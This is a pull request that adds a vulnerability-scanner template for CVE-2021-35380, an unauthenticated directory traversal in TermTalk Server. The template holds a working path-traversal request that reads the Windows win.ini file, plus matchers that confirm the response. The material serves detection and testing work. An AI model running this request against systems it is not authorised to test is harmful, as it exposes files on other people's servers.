### PR TITLE
Create CVE-2021-35380.yaml

### DIFF
--- a/cves/2021/CVE-2021-35380.yaml
+++ b/cves/2021/CVE-2021-35380.yaml
@@ -1,0 +1,31 @@
+id: CVE-2021-35380
+
+info:
+  name: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
+  author: fxploit
+  severity: high
+  description: A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
+  reference:
+    - https://www.swascan.com/solari-di-udine/
+    - https://www.exploit-db.com/exploits/50638
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-35380
+    cwe-id: CWE-22
+  tags: termtalk,lfi,unauth,cve,cve2022
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-35380

```
Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
```

Thanks

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO